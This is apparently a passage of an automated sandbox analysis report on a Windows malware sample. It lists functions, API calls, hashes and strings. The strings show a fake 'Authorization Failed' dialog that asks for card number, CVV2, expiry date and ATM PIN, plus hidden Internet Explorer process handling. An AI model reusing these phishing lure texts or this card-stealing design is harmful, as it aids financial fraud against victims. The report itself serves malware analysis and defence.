                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 90 4079e1-4079e3 82->90 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 91 4079b1 86->91 92 4079ab 86->92 87->80 88->82 89 4079ca-4079cd 88->89 89->82 93 4079c2 89->93 91->82 92->86 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
